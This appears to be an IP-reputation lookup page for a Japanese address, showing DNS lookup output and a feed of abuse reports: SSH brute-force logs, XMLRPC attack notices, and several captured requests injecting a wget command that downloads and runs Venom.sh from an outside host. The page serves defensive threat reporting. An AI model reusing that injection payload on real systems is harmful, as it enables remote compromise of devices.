Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: unknown

Region: unknown

Country: Japan

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:
No discussion about this IP yet. Click above link to make one.
Comments on same subnet:
No discussion about this subnet yet..
Whois info:
b
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 126.214.3.18
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 31918
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;126.214.3.18.			IN	A

;; AUTHORITY SECTION:
.			213	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2019103000 1800 900 604800 86400

;; Query time: 114 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Wed Oct 30 17:05:14 CST 2019
;; MSG SIZE  rcvd: 116
Host info
18.3.214.126.in-addr.arpa domain name pointer softbank126214003018.bbtec.net.
Nslookup info:
Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
18.3.214.126.in-addr.arpa	name = softbank126214003018.bbtec.net.

Authoritative answers can be found from:
Related IP info:
Related comments:
IP Type Details Datetime
93.90.74.240 attackspambots
Dec 23 07:26:36 vps58358 sshd\[29530\]: Invalid user dnlee from 93.90.74.240Dec 23 07:26:38 vps58358 sshd\[29530\]: Failed password for invalid user dnlee from 93.90.74.240 port 59507 ssh2Dec 23 07:27:05 vps58358 sshd\[29532\]: Invalid user aggergaard from 93.90.74.240Dec 23 07:27:07 vps58358 sshd\[29532\]: Failed password for invalid user aggergaard from 93.90.74.240 port 60635 ssh2Dec 23 07:27:30 vps58358 sshd\[29534\]: Failed password for root from 93.90.74.240 port 33528 ssh2Dec 23 07:27:54 vps58358 sshd\[29540\]: Failed password for root from 93.90.74.240 port 34654 ssh2
...
2019-12-23 17:49:38
165.227.96.190 attack
Dec 23 09:37:23 vpn01 sshd[11424]: Failed password for root from 165.227.96.190 port 56618 ssh2
...
2019-12-23 17:42:49
218.92.0.212 attackbotsspam
SSH Login Bruteforce
2019-12-23 17:26:39
156.204.9.57 attackbots
1 attack on wget probes like:
156.204.9.57 - - [22/Dec/2019:13:56:44 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11
2019-12-23 17:34:36
163.172.128.177 attack
Automatic report - XMLRPC Attack
2019-12-23 17:34:16
185.74.4.189 attackbotsspam
Dec 22 23:17:04 php1 sshd\[9897\]: Invalid user nfs from 185.74.4.189
Dec 22 23:17:04 php1 sshd\[9897\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=185.74.4.189
Dec 22 23:17:06 php1 sshd\[9897\]: Failed password for invalid user nfs from 185.74.4.189 port 45366 ssh2
Dec 22 23:23:15 php1 sshd\[10496\]: Invalid user savarim from 185.74.4.189
Dec 22 23:23:15 php1 sshd\[10496\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=185.74.4.189
2019-12-23 17:37:28
129.226.129.144 attackspam
Dec 23 10:47:57 sd-53420 sshd\[32074\]: Invalid user macradium from 129.226.129.144
Dec 23 10:47:57 sd-53420 sshd\[32074\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=129.226.129.144
Dec 23 10:47:59 sd-53420 sshd\[32074\]: Failed password for invalid user macradium from 129.226.129.144 port 41392 ssh2
Dec 23 10:53:43 sd-53420 sshd\[1728\]: Invalid user volpe from 129.226.129.144
Dec 23 10:53:43 sd-53420 sshd\[1728\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=129.226.129.144
...
2019-12-23 17:53:45
119.81.239.68 attackspam
2019-12-23T19:20:15.013188server01.hostname-sakh.net sshd[14782]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=119.81.239.68  user=r.r
2019-12-23T19:20:16.923023server01.hostname-sakh.net sshd[14782]: Failed password for r.r from 119.81.239.68 port 58026 ssh2
2019-12-23T20:08:07.300575server01.hostname-sakh.net sshd[15191]: Invalid user krisna from 119.81.239.68 port 34348
2019-12-23T20:08:07.321655server01.hostname-sakh.net sshd[15191]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=119.81.239.68
2019-12-23T20:08:09.842964server01.hostname-sakh.net sshd[15191]: Failed password for invalid user krisna from 119.81.239.68 port 34348 ssh2

........
-----------------------------------------------
https://www.blocklist.de/en/view.html?ip=119.81.239.68
2019-12-23 18:00:54
41.239.106.33 attack
1 attack on wget probes like:
41.239.106.33 - - [22/Dec/2019:20:02:45 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11
2019-12-23 18:04:45
83.97.20.98 attackbots
Automatic report - XMLRPC Attack
2019-12-23 17:57:11
41.238.48.2 attack
1 attack on wget probes like:
41.238.48.2 - - [22/Dec/2019:22:37:35 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11
2019-12-23 17:48:21
62.234.95.148 attackspam
Dec 23 09:16:43 server sshd\[27441\]: Invalid user cernada from 62.234.95.148
Dec 23 09:16:43 server sshd\[27441\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=62.234.95.148 
Dec 23 09:16:45 server sshd\[27441\]: Failed password for invalid user cernada from 62.234.95.148 port 36929 ssh2
Dec 23 09:27:44 server sshd\[30337\]: Invalid user poffel from 62.234.95.148
Dec 23 09:27:44 server sshd\[30337\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=62.234.95.148 
...
2019-12-23 18:02:21
197.34.159.60 attackbotsspam
2 attacks on wget probes like:
197.34.159.60 - - [22/Dec/2019:16:14:57 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11
2019-12-23 17:35:43
103.35.198.219 attackbotsspam
Dec 23 09:45:06 pi sshd\[1171\]: Failed password for invalid user js from 103.35.198.219 port 42213 ssh2
Dec 23 09:52:27 pi sshd\[1589\]: Invalid user dons from 103.35.198.219 port 58926
Dec 23 09:52:27 pi sshd\[1589\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=103.35.198.219
Dec 23 09:52:29 pi sshd\[1589\]: Failed password for invalid user dons from 103.35.198.219 port 58926 ssh2
Dec 23 10:07:46 pi sshd\[2425\]: Invalid user admin from 103.35.198.219 port 6829
...
2019-12-23 18:07:50
176.74.10.30 attackspam
1577082462 - 12/23/2019 07:27:42 Host: 176.74.10.30/176.74.10.30 Port: 445 TCP Blocked
2019-12-23 18:03:57

Recently Reported IPs

122.150.134.86 227.25.33.152 249.30.211.58 215.50.29.19
91.92.208.67 105.85.23.60 85.226.190.169 238.74.120.6
76.212.116.84 97.109.141.135 63.216.213.72 74.237.146.88
155.200.163.83 63.200.214.72 149.232.54.42 148.17.163.176
121.89.87.174 129.1.54.208 137.238.100.85 219.161.243.86